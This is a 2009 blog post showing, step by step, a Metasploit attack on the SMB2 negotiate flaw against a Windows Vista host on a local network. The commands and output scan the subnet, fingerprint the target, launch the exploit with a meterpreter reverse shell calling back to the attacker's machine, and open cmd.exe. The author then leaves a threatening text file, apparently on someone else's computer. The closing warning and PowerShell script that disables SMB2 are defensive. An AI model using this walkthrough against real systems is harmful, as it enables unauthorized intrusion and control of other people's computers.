Tuesday, October 6, 2009

Testing the new smb2 exploit

Recently I downloaded the Metasploit Framework 3.3 and tested the new, unpatched SMB2 exploit on my local network ;-D.

Run the metasploit framework console
$ ./msfconsole

Scan the network that has smb2 enabled
msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS 192.168.1.1-192.168.1.254
RHOSTS => 192.168.1.1-192.168.1.254
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run

[*] 192.168.1.10 supports SMB 2 [dialect 2.2] and has been online for 21 hours
[*] 192.168.1.15 supports SMB 2 [dialect 2.2] and has been online for 43 hours
[*] 192.168.1.111 supports SMB 2 [dialect 2.2] and has been online for 30 hours
[*] 192.168.1.121 supports SMB 2 [dialect 2.2] and has been online for 80 hours
[*] 192.168.1.123 supports SMB 2 [dialect 255.2] and has been online for 10 hours
[*] 192.168.1.197 supports SMB 2 [dialect 255.2] and has been online for 8 hours

Quite a result! Now check the Windows version of the selected IP
msf exploit(smb2_negotiate_func_index) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 192.168.1.15
RHOSTS => 192.168.1.15
msf auxiliary(version) > run

[*] 192.168.1.15 is running Windows Vista Ultimate Service Pack 1 (language: Unknown)
[*] Auxiliary module execution completed

It is Windows Vista. Now we’ll run the exploit against that IP
msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb2_negotiate_func_index) > set LHOST 192.168.1.46
LHOST => 192.168.1.46
msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(smb2_negotiate_func_index) > exploit

[*] Connecting to the target (192.168.1.15:445)…
[*] Started reverse handler
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.46:5678 -> 192.168.1.15:52010)

Succeeded! Now I’ve got access to the computer. That gives me full control of the computer
meterpreter > sysinfo
Computer: GREEN
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: ms_MY
meterpreter > execute -f cmd.exe -c -H -i

Process 636896 created.
Channel 2 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\>echo PLEASE DISABLE YOUR SMB2, OR I’LL RETURN > PLEASE DISABLE YOUR SMB2.txt

This is a dangerous situation: someone can get into your computer without you knowing about it, and worse, they can take your personal files and folders or spy on you.

If you’re connected to a public wired or wireless network (Starbucks, Old Town, or a lab), the recommended solution for the time being is to disable SMB2. You can get Microsoft’s released workaround for disabling SMB2 here.
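As an added example (not part of the original post, and not Microsoft's own Fix it package), the PowerShell below applies the workaround Microsoft published for this issue: setting the Smb2 DWORD value under the LanmanServer parameters to 0 and restarting the Server service. The function names are mine; it assumes an elevated PowerShell prompt on the Vista host being hardened.

```powershell
# Added example: disable the SMB2 server on a Vista / Server 2008 host.
# Implements Microsoft's documented registry workaround; run elevated.

$Smb2Key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb2ServerState {
    # Returns $true when SMB2 is enabled (value absent or non-zero), $false when disabled.
    $value = (Get-ItemProperty -Path $Smb2Key -Name Smb2 -ErrorAction SilentlyContinue).Smb2
    if ($null -eq $value) { return $true }   # no value present: SMB2 is on by default
    return ($value -ne 0)
}

function Disable-Smb2Server {
    if (-not (Get-Smb2ServerState)) {
        Write-Host 'SMB2 is already disabled on this host.'
        return
    }
    # REG_DWORD Smb2 = 0 is the documented workaround; -Force overwrites an existing value.
    New-ItemProperty -Path $Smb2Key -Name Smb2 -PropertyType DWord -Value 0 -Force | Out-Null

    # The Server service (LanmanServer) must be restarted for the change to take effect;
    # -Force also restarts services that depend on it, such as Computer Browser.
    Restart-Service -Name LanmanServer -Force

    # Verify the value actually landed (it will not if the shell was not elevated).
    if (Get-Smb2ServerState) {
        throw 'Smb2 value was not written; re-run from an elevated PowerShell prompt.'
    }
    Write-Host 'SMB2 disabled. SMB1 remains available, so file sharing still works.'
}

Disable-Smb2Server
```

Setting the same value back to 1 (or deleting it) and restarting the Server service re-enables SMB2 once the host is patched.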

Don’t ignore this, or you’ll be in trouble.
